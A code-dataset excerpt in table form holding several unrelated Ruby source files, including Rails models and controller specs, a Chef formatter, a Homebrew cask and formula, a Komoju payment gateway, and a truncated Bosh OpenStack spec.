hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
4a530e626abf69a8db45cd44a98fcf4986b913c4 | 791 | require 'travis/yml/helper/obj'
module Travis
  module Yml
    # Collects config-linting messages as raw [level, key, code, args]
    # tuples and renders them as hashes (#messages) or formatted strings
    # (#full_messages).
    class Msgs
      include Enumerable, Helper::Obj
      attr_reader :msgs
      def initialize
        @msgs = []
      end
      # Yields each raw msg tuple; backs the Enumerable interface.
      def each(&block)
        msgs.each(&block)
      end
      def to_a
        msgs
      end
      # Appends all msgs from another Msgs (or any #to_a responder) in place.
      def concat(other)
        msgs.concat(other.to_a)
      end
      # Maps each tuple to a compacted hash; :src and :line are hoisted out
      # of args to top-level keys. (compact/except presumably come from
      # Helper::Obj — confirm.)
      def messages
        msgs.map do |level, key, code, args|
          compact(
            type: 'config',
            level: level,
            key: key,
            code: code,
            args: except(args, :src, :line),
            src: args[:src],
            line: args[:line]
          )
        end
      end
      # Formats each msg into a human-readable string via Yml.msg.
      def full_messages
        msgs.map do |msg|
          Yml.msg(msg)
        end
      end
    end
  end
end
| 16.479167 | 44 | 0.470291 |
26d704417de684d0913281b91c9368f39cdb4aac | 2,771 | require 'rails_helper'
require 'support/devise'
# Controller specs for ReportsController#location, covering the three modes:
# location-scoped with tree display, location-scoped without, and global.
RSpec.describe ReportsController, type: :controller do
  login_report

  describe "GET #location" do
    it "returns http success" do
      get :location
      expect(response).to have_http_status(:success)
    end

    # Fixed typo ("Ture") and trailing whitespace in example descriptions.
    describe "Variable Assignments, Display tree true" do
      let(:location) { create(:location) }

      before(:each) do
        get :location, params: { id: location.to_param, order_to: true, expiries: true, display_tree: true }
      end

      it "assigns @order_to to true" do
        expect(assigns(:order_to)).to be_truthy
      end

      it "assigns expiries to be true" do
        expect(assigns(:expiries)).to be_truthy
      end

      it "assigns @global to be false" do
        expect(assigns(:global)).to be_falsey
      end

      it "assigns @location correctly" do
        expect(assigns(:location)).to eq(location)
      end

      it "assigns @display_tree correctly" do
        expect(assigns(:display_tree)).to be_truthy
      end

      it "assigns locations to be location subtree" do
        expect(assigns(:location_tree)).to eq({location => {}})
      end
    end

    describe "Variable Assignments, Display tree false" do
      let(:location) { create(:location) }

      before(:each) do
        get :location, params: { id: location.to_param }
      end

      it "assigns @order_to to false" do
        expect(assigns(:order_to)).to be_falsey
      end

      it "assigns expiries to be false" do
        expect(assigns(:expiries)).to be_falsey
      end

      it "assigns @global to be false" do
        expect(assigns(:global)).to be_falsey
      end

      it "assigns @location correctly" do
        expect(assigns(:location)).to eq(location)
      end

      it "assigns @display_tree correctly" do
        expect(assigns(:display_tree)).to be_falsey
      end
    end

    describe "Global Report variable assignments" do
      before(:each) do
        create(:stock_item)
        create(:location)
        get :location, params: { display_tree: true }
      end

      it "assigns @order_to to false" do
        expect(assigns(:order_to)).to be_falsey
      end

      it "assigns expiries to be false" do
        expect(assigns(:expiries)).to be_falsey
      end

      it "assigns @global to be true" do
        expect(assigns(:global)).to be_truthy
      end

      it "assigns @display_tree correctly" do
        expect(assigns(:display_tree)).to be_truthy
      end

      it "assigns @stock_item_summaries to be summary" do
        expect(assigns(:stock_item_summaries).first.stock_item).to eq(StockItem.first)
      end

      it "assigns locations to be global tree" do
        expect(assigns(:location_tree)).to eq({Location.first => {}})
      end
    end
  end
end
| 29.795699 | 107 | 0.635511 |
21f9f8df3b688b33fcf1383b17dddd439d2ee225 | 3,596 | class Comment < ActiveRecord::Base
belongs_to :commentable, :polymorphic => true
belongs_to :user
belongs_to :recipient, :class_name => "User", :foreign_key => "recipient_id"
validates_presence_of :comment
# validates_presence_of :recipient
validates_length_of :comment, :maximum => 2000
before_save :whitelist_attributes
validates_presence_of :user, :unless => Proc.new{|record| AppConfig.allow_anonymous_commenting }
validates_presence_of :author_email, :unless => Proc.new{|record| record.user } #require email unless logged in
validates_presence_of :author_ip, :unless => Proc.new{|record| record.user} #log ip unless logged in
validates_format_of :author_url, :with => /(^$)|(^(http|https):\/\/[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}(([0-9]{1,5})?\/.*)?$)/ix, :unless => Proc.new{|record| record.user }
acts_as_activity :user, :if => Proc.new{|record| record.user } #don't record an activity if there's no user
# named_scopes
named_scope :recent, :order => 'created_at DESC'
def self.find_photo_comments_for(user)
Comment.find(:all, :conditions => ["recipient_id = ? AND commentable_type = ?", user.id, 'Photo'], :order => 'created_at DESC')
end
# Helper class method to lookup all comments assigned
# to all commentable types for a given user.
def self.find_comments_by_user(user, *args)
options = args.extract_options!
find(:all,
:conditions => ["user_id = ?", user.id],
:order => "created_at DESC",
:limit => options[:limit]
)
end
def previous_commenters_to_notify
# only send a notification on recent comments
# limit the number of emails we'll send (or posting will be slooowww)
User.find(:all,
:conditions => ["users.id NOT IN (?) AND users.notify_comments = ?
AND commentable_id = ? AND commentable_type = ?
AND comments.created_at > ?", [user_id, recipient_id.to_i], true, commentable_id, commentable_type, 2.weeks.ago],
:include => :comments_as_author, :group => "users.id", :limit => 20)
end
def commentable_name
type = self.commentable_type.underscore
case type
when 'user'
commentable.login
when 'post'
commentable.title
when 'clipping'
commentable.description || "Clipping from #{commentable.user.login}"
when 'photo'
commentable.description || "Photo from #{commentable.user.login}"
else
commentable.class.to_s.humanize
end
end
def title_for_rss
"Comment from #{username}"
end
def username
user ? user.login : (author_name.blank? ? 'Anonymous' : author_name)
end
def self.find_recent(options = {:limit => 5})
find(:all, :conditions => "created_at > '#{14.days.ago.to_s :db}'", :order => "created_at DESC", :limit => options[:limit])
end
def can_be_deleted_by(person)
person && (person.admin? || person.id.eql?(user.id) || person.id.eql?(recipient.id) )
end
def should_notify_recipient?
return unless recipient
return false if recipient.eql?(user)
return false unless recipient.notify_comments?
true
end
def notify_previous_commenters
previous_commenters_to_notify.each do |commenter|
UserNotifier.deliver_follow_up_comment_notice(commenter, self)
end
end
def send_notifications
UserNotifier.deliver_comment_notice(self) if should_notify_recipient?
self.notify_previous_commenters
end
protected
def whitelist_attributes
self.comment = white_list(self.comment)
end
end
| 33.924528 | 180 | 0.672692 |
0195d0e1fbc6c542dc70d3d0ab65052d75688dea | 1,401 | module Application
class << self
def initialize!
load_entities
load_lib
load_models
load_helpers
load_restfuls_v1
load_routes
load_validations
load_comm
load_patch
load_api
end
private
def load_entities
Dir[File.expand_path('../entities/*.rb', __FILE__)].each {|entity| require entity }
end
def load_models
Dir[File.expand_path('../../models/*.rb', __FILE__)].each {|model| require model }
end
def load_helpers
Dir[File.expand_path('../helpers/*.rb', __FILE__)].each {|helper| require helper }
end
def load_routes
Dir[File.expand_path('../restfuls/*.rb', __FILE__)].each {|route| require route }
end
def load_restfuls_v1
Dir[File.expand_path('../restfuls/v1/*.rb', __FILE__)].each {|api| require api }
end
def load_lib
Dir[File.expand_path('../../../lib/base_user/*.rb', __FILE__)].each {|lib| require lib }
end
def load_validations
Dir[File.expand_path('../validations/*.rb', __FILE__)].each {|val| require val }
end
def load_comm
require File.expand_path('../comm', __FILE__)
end
def load_patch
require File.expand_path('../patch', __FILE__)
end
def load_api
require File.expand_path('../api', __FILE__)
end
end
end
# Initialize Application
Application.initialize!
| 21.890625 | 94 | 0.630978 |
61d39d113dc7b4ba132cb334888d9c3e669bcfe0 | 208 | module SparkApi
module Models
class PortalListingCart < ListingCart
def self.find(contact_id, *arguments)
@contact_id = contact_id
super(*arguments)
end
end
end
end
| 14.857143 | 43 | 0.649038 |
79ce1b6d36ebf8dcad1d59978972d06a61d6d963 | 2,013 | module Users
class BackupCodeSetupController < ApplicationController
include MfaSetupConcern
include RememberDeviceConcern
before_action :authenticate_user!
before_action :confirm_user_authenticated_for_2fa_setup
before_action :ensure_backup_codes_in_session, only: %i[continue download]
before_action :set_backup_code_setup_presenter
def index
@presenter = BackupCodeCreatePresenter.new
end
def depleted
@presenter = BackupCodeDepletedPresenter.new
end
def create
generate_codes
result = BackupCodeSetupForm.new(current_user).submit
analytics.track_event(Analytics::BACKUP_CODE_SETUP_VISIT, result.to_h)
analytics.track_event(Analytics::BACKUP_CODE_CREATED)
Funnel::Registration::AddMfa.call(current_user.id, 'backup_codes')
save_backup_codes
end
def edit; end
def continue
flash[:success] = t('notices.backup_codes_configured')
redirect_to two_2fa_setup
end
def download
data = user_session[:backup_codes].join("\r\n") + "\r\n"
send_data data, filename: 'backup_codes.txt'
end
private
def ensure_backup_codes_in_session
redirect_to backup_code_setup_url unless user_session[:backup_codes]
end
def generate_codes
@codes = generator.generate
user_session[:backup_codes] = @codes
end
def set_backup_code_setup_presenter
@presenter = SetupPresenter.new(current_user, user_fully_authenticated?)
end
def mark_user_as_fully_authenticated
user_session[TwoFactorAuthentication::NEED_AUTHENTICATION] = false
user_session[:authn_at] = Time.zone.now
end
def save_backup_codes
mark_user_as_fully_authenticated
generator.save(user_session[:backup_codes])
create_user_event(:backup_codes_added)
revoke_remember_device(current_user) unless user_session['signing_up']
end
def generator
@generator ||= BackupCodeGenerator.new(@current_user)
end
end
end
| 27.958333 | 78 | 0.740189 |
acbf681eabecd1e281ad14fde5e97bf8f234572c | 626 | cask "chrysalis" do
version "0.8.2"
sha256 "4008f87f49271bed6e27f3f7d359ce8537df179cad35dd8b0f6e56b4179b66e4"
url "https://github.com/keyboardio/Chrysalis/releases/download/v#{version}/Chrysalis-#{version}.dmg"
name "Chrysalis"
desc "Graphical configurator for Kaleidoscope-powered keyboards"
homepage "https://github.com/keyboardio/Chrysalis"
livecheck do
url :url
strategy :github_latest
regex(%r{href=.*?/Chrysalis-(\d+(?:\.\d+)*)\.dmg}i)
end
app "Chrysalis.app"
zap trash: [
"~/Library/Application Support/chrysalis",
"~/Library/Preferences/keyboardio.chrysalis.plist",
]
end
| 27.217391 | 102 | 0.722045 |
e286845ad35549f3884fcb1da14b097cdb1545c9 | 907 | require File.expand_path('../../../spec_helper', __FILE__)
describe "File.lchmod" do
  # lchmod is unsupported on these platforms, so the examples are skipped there.
  platform_is_not :os => [:linux, :windows, :openbsd, :solaris] do
    before :each do
      # A regular file plus a symlink pointing at it.
      @fname = tmp('file_chmod_test')
      @lname = @fname + '.lnk'
      touch(@fname) { |f| f.write "rubinius" }
      rm_r @lname
      File.symlink @fname, @lname
    end

    after :each do
      rm_r @lname, @fname
    end

    it "changes the file mode of the link and not of the file" do
      File.chmod(0222, @lname).should == 1
      File.lchmod(0755, @lname).should == 1
      # lstat inspects the symlink itself; stat follows it to the target.
      File.lstat(@lname).executable?.should == true
      File.lstat(@lname).readable?.should == true
      File.lstat(@lname).writable?.should == true
      File.stat(@lname).executable?.should == false
      File.stat(@lname).readable?.should == false
      File.stat(@lname).writable?.should == true
    end
  end
end
| 27.484848 | 66 | 0.596472 |
f717277e9b6918d1235a6025c43ab557939df5ba | 127 | class SettingsController < ApplicationController
layout "devise"
before_action :authenticate_user!
def index
end
end
| 14.111111 | 48 | 0.787402 |
e23276967a49b2b76c9ec83e7accbf86d8d1bc8d | 333 | module TestUnit
module Generators
class DecoratorGenerator < ::Rails::Generators::NamedBase
source_root File.expand_path('../templates', __FILE__)
def create_decorator_test
template 'decorator_test.rb', File.join('test/decorators', class_path, "#{file_name}_decorator_test.rb")
end
end
end
end
| 27.75 | 112 | 0.714715 |
e9f57f15dde25b7937306cd774671430555ded62 | 9,867 | require 'chef/formatters/base'
require 'chef/formatters/error_mapper'
module ChefSpec
  # Chef run formatter used by ChefSpec: implements every formatter callback
  # as a no-op except failure hooks, which display the error unless the
  # exception was declared as expected by the spec.
  class ChefFormatter < Chef::Formatters::Base
    cli_name :chefspec

    # Called at the very start of a Chef Run
    def run_start(version); end

    def run_started(run_status); end

    # Called at the end a successful Chef run.
    def run_completed(node); end

    # Called at the end of a failed Chef run.
    def run_failed(exception); end

    # Called right after ohai runs.
    def ohai_completed(node); end

    # Already have a client key, assuming this node has registered.
    def skipping_registration(node_name, config); end

    # About to attempt to register as +node_name+
    def registration_start(node_name, config); end

    def registration_completed; end

    # Failed to register this client with the server.
    def registration_failed(node_name, exception, config)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.registration_failed(node_name, exception, config)
        display_error(description)
      end
    end

    # Called before Chef client loads the node data from the server
    def node_load_start(node_name, config); end

    # Failed to load node data from the server
    def node_load_failed(node_name, exception, config)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.node_load_failed(node_name, exception, config)
        display_error(description)
      end
    end

    # Error expanding the run list
    def run_list_expand_failed(node, exception)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.run_list_expand_failed(node, exception)
        display_error(description)
      end
    end

    # Called after Chef client has loaded the node data.
    # Default and override attrs from roles have been computed, but not yet applied.
    # Normal attrs from JSON have been added to the node.
    def node_load_completed(node, expanded_run_list, config); end

    # Called before the cookbook collection is fetched from the server.
    def cookbook_resolution_start(expanded_run_list); end

    # Called when there is an error getting the cookbook collection from the
    # server.
    def cookbook_resolution_failed(expanded_run_list, exception)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.cookbook_resolution_failed(expanded_run_list, exception)
        display_error(description)
      end
    end

    # Called when the cookbook collection is returned from the server.
    def cookbook_resolution_complete(cookbook_collection); end

    # Called before unneeded cookbooks are removed
    def cookbook_clean_start; end

    # Called after the file at +path+ is removed. It may be removed if the
    # cookbook containing it was removed from the run list, or if the file was
    # removed from the cookbook.
    def removed_cookbook_file(path); end

    # Called when cookbook cleaning is finished.
    def cookbook_clean_complete; end

    # Called before cookbook sync starts
    def cookbook_sync_start(cookbook_count); end

    # Called when cookbook +cookbook_name+ has been sync'd
    def synchronized_cookbook(cookbook_name); end

    # Called when an individual file in a cookbook has been updated
    def updated_cookbook_file(cookbook_name, path); end

    # Called when an error occurs during cookbook sync
    def cookbook_sync_failed(cookbooks, exception)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.cookbook_sync_failed(cookbooks, exception)
        display_error(description)
      end
    end

    # Called after all cookbooks have been sync'd.
    def cookbook_sync_complete; end

    # Called when library file loading starts
    def library_load_start(file_count); end

    # Called when library file has been loaded
    def library_file_loaded(path); end

    # Called when a library file has an error on load.
    def library_file_load_failed(path, exception)
      file_load_failed(path, exception)
    end

    # Called when library file loading has finished
    def library_load_complete; end

    # Called when LWRP loading starts
    def lwrp_load_start(lwrp_file_count); end

    # Called after a LWR or LWP has been loaded
    def lwrp_file_loaded(path); end

    # Called after a LWR or LWP file errors on load
    def lwrp_file_load_failed(path, exception)
      file_load_failed(path, exception)
    end

    # Called when LWRPs are finished loading
    def lwrp_load_complete; end

    # Called when an ohai plugin file loading starts
    def ohai_plugin_load_start(file_count); end

    # Called when an ohai plugin file has been loaded
    def ohai_plugin_file_loaded(path); end

    # Called when an ohai plugin file has an error on load.
    def ohai_plugin_file_load_failed(path, exception); end

    # Called when an ohai plugin file loading has finished
    def ohai_plugin_load_complete; end

    # Called before attribute files are loaded
    def attribute_load_start(attribute_file_count); end

    # Called after the attribute file is loaded
    def attribute_file_loaded(path); end

    # Called when an attribute file fails to load.
    def attribute_file_load_failed(path, exception)
      file_load_failed(path, exception)
    end

    # Called when attribute file loading is finished
    def attribute_load_complete; end

    # Called before resource definitions are loaded
    def definition_load_start(definition_file_count); end

    # Called when a resource definition has been loaded
    def definition_file_loaded(path); end

    # Called when a resource definition file fails to load
    def definition_file_load_failed(path, exception)
      file_load_failed(path, exception)
    end

    # Called when resource defintions are done loading
    def definition_load_complete; end

    # Called before recipes are loaded
    def recipe_load_start(recipe_count); end

    # Called after the recipe has been loaded
    def recipe_file_loaded(path); end

    # Called after a recipe file fails to load
    def recipe_file_load_failed(path, exception)
      file_load_failed(path, exception)
    end

    # Called when a recipe cannot be resolved
    def recipe_not_found(exception)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.file_load_failed(nil, exception)
        display_error(description)
      end
    end

    # Called when recipes have been loaded.
    def recipe_load_complete; end

    # Called before convergence starts
    def converge_start(run_context); end

    # Called when the converge phase is finished.
    def converge_complete; end

    # Called before action is executed on a resource.
    def resource_action_start(resource, action, notification_type=nil, notifier=nil); end

    # Called when a resource fails, but will retry.
    def resource_failed_retriable(resource, action, retry_count, exception); end

    # Called when a resource fails and will not be retried.
    def resource_failed(resource, action, exception)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.resource_failed(resource, action, exception)
        display_error(description)
      end
    end

    # Called when a resource action has been skipped b/c of a conditional
    def resource_skipped(resource, action, conditional); end

    # Called when a resource action has been completed
    def resource_completed(resource); end

    # Called after #load_current_resource has run.
    def resource_current_state_loaded(resource, action, current_resource); end

    # Called when resource current state load is skipped due to the provider
    # not supporting whyrun mode.
    def resource_current_state_load_bypassed(resource, action, current_resource); end

    # Called when evaluating a resource that does not support whyrun in whyrun mode
    def resource_bypassed(resource, action, current_resource); end

    # Called when a resource has no converge actions, e.g., it was already correct.
    def resource_up_to_date(resource, action); end

    # Called when a change has been made to a resource. May be called multiple
    # times per resource, e.g., a file may have its content updated, and then
    # its permissions updated.
    def resource_update_applied(resource, action, update); end

    # Called after a resource has been completely converged, but only if
    # modifications were made.
    def resource_updated(resource, action); end

    # Called before handlers run
    def handlers_start(handler_count); end

    # Called after an individual handler has run
    def handler_executed(handler); end

    # Called after all handlers have executed
    def handlers_completed; end

    # Called when an assertion declared by a provider fails
    def provider_requirement_failed(action, resource, exception, message); end

    # Called when a provider makes an assumption after a failed assertion
    # in whyrun mode, in order to allow execution to continue
    def whyrun_assumption(action, resource, message); end

    # An uncategorized message. This supports the case that a user needs to
    # pass output that doesn't fit into one of the callbacks above. Note that
    # there's no semantic information about the content or importance of the
    # message. That means that if you're using this too often, you should add a
    # callback for it.
    def msg(message); end

    private

    # Shared failure handler for the file-load callbacks above: reports the
    # error unless the exception was expected by the spec.
    def file_load_failed(path, exception)
      expecting_exception(exception) do
        description = Chef::Formatters::ErrorMapper.file_load_failed(path, exception)
        display_error(description)
      end
    end

    # Runs the block only when +exception+ was NOT registered as an expected
    # exception (see ChefSpec::ExpectException).
    def expecting_exception(exception, &block)
      yield unless ChefSpec::ExpectException.new(exception).expected?
    end
  end
end
| 34.865724 | 108 | 0.736495 |
b92a9b1ca85dd58b3c876369291a93efde435921 | 90 | class StaticController < ApplicationController
skip_before_filter :ensure_signed_in
end
| 22.5 | 46 | 0.877778 |
1a52dc2d2df8f63593d076a0461027236a054cb8 | 1,332 | class Gocryptfs < Formula
desc "Encrypted overlay filesystem written in Go"
homepage "https://nuetzlich.net/gocryptfs/"
url "https://github.com/rfjakob/gocryptfs/releases/download/v1.8.0/gocryptfs_v1.8.0_src-deps.tar.gz"
sha256 "c4ca576c2a47f0ed395b96f70fb58fc8f7b4beced8ae67e356eeed6898f8352a"
license "MIT"
bottle do
sha256 cellar: :any, catalina: "adf2a34cc99f353992e790c856971e9128d55caf5c51a2ae0a50ff5506e63c1c"
sha256 cellar: :any, mojave: "3e4cd09514efbd074f41f6636f0df0b01708856446c1da1d6cfe766cd8cae121"
sha256 cellar: :any, high_sierra: "a7e6b3d28c3e3cd78ff4be78adc8d2feeb8061c7459d2c8e6f04e61f0029bb51"
end
depends_on "go" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]"
on_macos do
disable! date: "2021-04-08", because: "requires FUSE"
end
on_linux do
depends_on "libfuse"
end
def install
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/rfjakob/gocryptfs").install buildpath.children
cd "src/github.com/rfjakob/gocryptfs" do
system "./build.bash"
bin.install "gocryptfs"
prefix.install_metafiles
end
end
test do
(testpath/"encdir").mkpath
pipe_output("#{bin}/gocryptfs -init #{testpath}/encdir", "password", 0)
assert_predicate testpath/"encdir/gocryptfs.conf", :exist?
end
end
| 31.714286 | 104 | 0.738739 |
62b9fb77e6b001512b182f4bc8eb1e490b401336 | 430 | package "yum-s3-iam" do
  # Pin the package to the version configured in node attributes.
  version node['yum_s3_iam']['version']
end
# Render the yum repo definition pointing at the S3-backed repository.
template File.join('/', 'etc', 'yum.repos.d', "#{node['yum_s3_iam']['repo_name']}.repo") do
  owner 'root'
  group 'root'
  mode '0644'
  source 's3-iam.repo.erb'
  variables :repo_name => node['yum_s3_iam']['repo_name'],
            :repo_description => node['yum_s3_iam']['repo_description'],
            :repo_bucket => node['yum_s3_iam']['repo_bucket']
end
| 30.714286 | 91 | 0.639535 |
1d80aec337e185b986fe26ea77e68884ff079c7d | 618 | require 'thor'
require 'fxpotato'
require 'date'
require 'fxpotato/cli_formatter'
module FxPotato
  # Thor-based command line interface for FxPotato.
  class CLI < Thor
    desc "getrate BASE TARGET", "Gets the foreign exchange rate for the given currencies on the chosen date."
    method_option :date, :aliases => "-d", :desc => "A specific date to get the rate for, e.g. -d 2017-05-29. Defaults to today."
    # Looks up the BASE->TARGET rate (defaulting to today) and prints either
    # the formatted result or the lookup error's message.
    def getrate(base, target)
      date = options[:date] || Date.today
      begin
        fxrate = FxPotato.at(base, target, date)
        puts CLIFormatter.result(fxrate)
      rescue RuntimeError => message
        puts message
      end
    end
  end
end
| 29.428571 | 129 | 0.666667 |
b9500cb27f2dbdb71b0ceb6e2bd6e2517b0d4909 | 835 | #!/usr/bin/env ruby
#
# Put description here
#
#
#
#
#
require 'swig_assert'
require 'using_composition'
include Using_composition
# Exercise each composed class: blah must echo back an int, a double,
# and a string unchanged.
{ 'FooBar' => FooBar, 'FooBar2' => FooBar2, 'FooBar3' => FooBar3 }.each do |name, klass|
  instance = klass.new
  unless instance.blah(3) == 3
    raise RuntimeError, "#{name}::blah(int)"
  end
  unless instance.blah(3.5) == 3.5
    raise RuntimeError, "#{name}::blah(double)"
  end
  unless instance.blah("hello") == "hello"
    raise RuntimeError, "#{name}::blah(char *)"
  end
end
| 14.649123 | 44 | 0.664671 |
5d95228a99c84aa264b0962ac336d0afcb6b8e66 | 1,389 | class TreeBuilderReportSavedReports < TreeBuilderReportReportsClass
private
def tree_init_options(_tree_name)
{
:full_ids => true,
:leaf => 'MiqReportResult'
}
end
def set_locals_for_render
locals = super
locals.merge!(:autoload => true)
end
def root_options
{
:text => t = _("All Saved Reports"),
:tooltip => t
}
end
# Get root nodes count/array for explorer tree
def x_get_tree_roots(_count_only, _options)
u = User.current_user
user_groups = u.report_admin_user? ? nil : u.miq_groups
having_report_results(user_groups).pluck(:name, :id).sort.map do |name, id|
{:id => id.to_i.to_s, :text => name, :icon => 'fa fa-file-text-o', :tip => name}
end
end
def x_get_tree_custom_kids(object, count_only, _options)
scope = MiqReportResult.with_current_user_groups_and_report(object[:id].split('-').last)
count_only ? 1 : scope.order("last_run_on DESC").includes(:miq_task).to_a
end
# Scope on reports that have report results.
def having_report_results(miq_groups)
miq_group_relation = MiqReport.joins(:miq_report_results).distinct
if miq_groups.nil? # u.report_admin_user?
miq_group_relation.where.not(:miq_report_results => {:miq_group_id => nil})
else
miq_group_relation.where(:miq_report_results => {:miq_group_id => miq_groups})
end
end
end
| 29.553191 | 92 | 0.691145 |
abb745f19b87bd58cbd48fd3755dce892ef5c0c9 | 651 | require 'spec_helper'
describe 'gnocchi::client' do
  shared_examples_for 'gnocchi client' do
    it { is_expected.to contain_class('gnocchi::params') }

    it 'installs gnocchi client package' do
      is_expected.to contain_package('python-gnocchiclient').with(
        :ensure => 'present',
        :name => 'python-gnocchiclient',
        :tag => 'openstack',
      )
    end
  end

  # Run the shared examples against every supported OS fact set.
  on_supported_os({
    :supported_os => OSDefaults.get_supported_os
  }).each do |os,facts|
    context "on #{os}" do
      let (:facts) do
        facts.merge!(OSDefaults.get_facts())
      end

      it_behaves_like 'gnocchi client'
    end
  end
end
| 21 | 66 | 0.631336 |
bf71fadd2cf64035d48b69bef66b4a10e0065d69 | 127 | class AddChoicesToQuestions < ActiveRecord::Migration[5.2]
def change
add_column :questions, :choices, :string
end
end
| 21.166667 | 58 | 0.755906 |
f8b8ad08e01034a8d2e0c554a7d441887fb21708 | 323 | # frozen_string_literal: true
# Creates the animals table for the rescue/adoption domain.
class CreateAnimals < ActiveRecord::Migration[5.2]
  def change
    create_table :animals do |t|
      t.string :name
      t.string :gender
      # Single date column apparently shared for birth/rescue date —
      # confirm intended semantics with the model.
      t.date :birthdate_rescuedate
      t.boolean :rescued
      t.boolean :adopted
      t.date :adoption_date

      t.timestamps
    end
  end
end
| 19 | 50 | 0.662539 |
ac0aa2a9a99d612a13732369c8fb9df41b2e0db5 | 418 | module CourseExports
class PrepareJob < ApplicationJob
include Loggable
queue_as :low_priority
def perform(course_export)
# Prepare the export.
CourseExports::PrepareService.new(course_export).execute
# Notify the user who requested the export.
unless course_export.user.email_bounced?
CourseExportMailer.prepared(course_export).deliver_now
end
end
end
end
| 23.222222 | 62 | 0.727273 |
d53ab5f5165bfc68d28c494552bdffb1717f642d | 3,649 | require 'json'
module ActiveMerchant #:nodoc:
  module Billing #:nodoc:
    # ActiveMerchant gateway for Komoju (https://www.komoju.com/), a Japanese
    # payment provider. Supports credit card purchases and refunds over
    # Komoju's JSON REST API (v1).
    class KomojuGateway < Gateway
      self.test_url = 'https://komoju.com/api/v1'
      self.live_url = 'https://komoju.com/api/v1'
      self.supported_countries = ['JP']
      self.default_currency = 'JPY'
      self.money_format = :cents
      self.homepage_url = 'https://www.komoju.com/'
      self.display_name = 'Komoju'
      self.supported_cardtypes = [:visa, :master, :american_express, :jcb]

      # Komoju error codes mapped to ActiveMerchant's standard error codes.
      STANDARD_ERROR_CODE_MAPPING = {
        'bad_verification_value' => 'incorrect_cvc',
        'card_expired' => 'expired_card',
        'card_declined' => 'card_declined',
        'invalid_number' => 'invalid_number'
      }

      # Requires :login — the Komoju API key, sent as the basic-auth user.
      def initialize(options = {})
        requires!(options, :login)
        super
      end

      # Creates a payment. +payment+ is a credit card; +options+ may include
      # :description, :currency, :order_id, :tax, :email, :ip,
      # :browser_language and :browser_user_agent.
      def purchase(money, payment, options = {})
        post = {}
        post[:amount] = amount(money)
        post[:description] = options[:description]
        add_payment_details(post, payment, options)
        post[:currency] = options[:currency] || default_currency
        post[:external_order_num] = options[:order_id] if options[:order_id]
        post[:tax] = options[:tax] if options[:tax]
        add_fraud_details(post, options)
        commit('/payments', post)
      end

      # Refunds a payment. NOTE(review): +money+ is ignored — the refund
      # endpoint is called with an empty body (presumably a full refund);
      # confirm against the Komoju API if partial refunds are needed.
      def refund(money, identification, options = {})
        commit("/payments/#{identification}/refund", {})
      end

      private

      # Builds the credit_card payment_details hash for the request body.
      def add_payment_details(post, payment, options)
        details = {}
        details[:type] = 'credit_card'
        details[:number] = payment.number
        details[:month] = payment.month
        details[:year] = payment.year
        details[:verification_value] = payment.verification_value
        details[:given_name] = payment.first_name
        details[:family_name] = payment.last_name
        details[:email] = options[:email] if options[:email]
        post[:payment_details] = details
      end

      # Attaches optional fraud-screening details; the key is omitted
      # entirely when no relevant options are present.
      def add_fraud_details(post, options)
        details = {}
        details[:customer_ip] = options[:ip] if options[:ip]
        details[:customer_email] = options[:email] if options[:email]
        details[:browser_language] = options[:browser_language] if options[:browser_language]
        details[:browser_user_agent] = options[:browser_user_agent] if options[:browser_user_agent]
        post[:fraud_details] = details unless details.empty?
      end

      # POSTs +data+ and parses the JSON response. Komoju returns error
      # details in the body of HTTP error responses, so those are parsed
      # rather than raised.
      def api_request(path, data)
        raw_response = nil
        begin
          raw_response = ssl_post("#{url}#{path}", data, headers)
        rescue ResponseError => e
          raw_response = e.response.body
        end
        JSON.parse(raw_response)
      end

      # Sends the request and wraps the result in an ActiveMerchant
      # Response; success is the absence of an 'error' key.
      def commit(path, params)
        response = api_request(path, params.to_json)
        success = !response.key?('error')
        message = (success ? 'Transaction succeeded' : response['error']['message'])
        Response.new(
          success,
          message,
          response,
          test: test?,
          error_code: (success ? nil : error_code(response['error']['code'])),
          authorization: (success ? response['id'] : nil)
        )
      end

      # Translates a Komoju error code to the standard code, falling back
      # to the raw code when unmapped.
      def error_code(code)
        STANDARD_ERROR_CODE_MAPPING[code] || code
      end

      def url
        test? ? self.test_url : self.live_url
      end

      # Basic auth uses the API key as user with a blank password.
      def headers
        {
          'Authorization' => 'Basic ' + Base64.encode64(@options[:login].to_s + ':').strip,
          'Accept' => 'application/json',
          'Content-Type' => 'application/json',
          'User-Agent' => "Komoju/v1 ActiveMerchantBindings/#{ActiveMerchant::VERSION}"
        }
      end
    end
  end
end
| 31.456897 | 99 | 0.605097 |
386c977be37182d0e31da296e74338c4ca59bf2f | 6,460 | # Copyright (c) 2009-2013 VMware, Inc.
# Copyright (c) 2012 Piston Cloud Computing, Inc.
require 'spec_helper'
# Unit tests for Cloud#attach_disk: device-name selection, registry settings
# updates, and idempotency when the volume is already attached.
describe Bosh::OpenStackCloud::Cloud do
  let(:server) { double('server', :id => 'i-test', :name => 'i-test', :flavor => { 'id' => 'f-test'} ) }
  let(:volume) { double('volume', :id => 'v-foobar') }
  let(:flavor) { double('flavor', :id => 'f-test', :ephemeral => 10, :swap => '') }
  # Cloud double wired so id lookups return the doubles above.
  let(:cloud) do
    mock_cloud(cloud_options['properties']) do |openstack|
      expect(openstack.servers).to receive(:get).with('i-test').and_return(server)
      expect(openstack.volumes).to receive(:get).with('v-foobar').and_return(volume)
      expect(openstack.flavors).to receive(:find).and_return(flavor)
    end
  end
  let(:cloud_options) { mock_cloud_options }
  before(:each) do
    @registry = mock_registry
  end
  it 'attaches an OpenStack volume to a server' do
    volume_attachments = []
    attachment = double('attachment', :device => '/dev/sdc')
    expect(server).to receive(:volume_attachments).and_return(volume_attachments)
    expect(volume).to receive(:attach).with(server.id, '/dev/sdc').and_return(attachment)
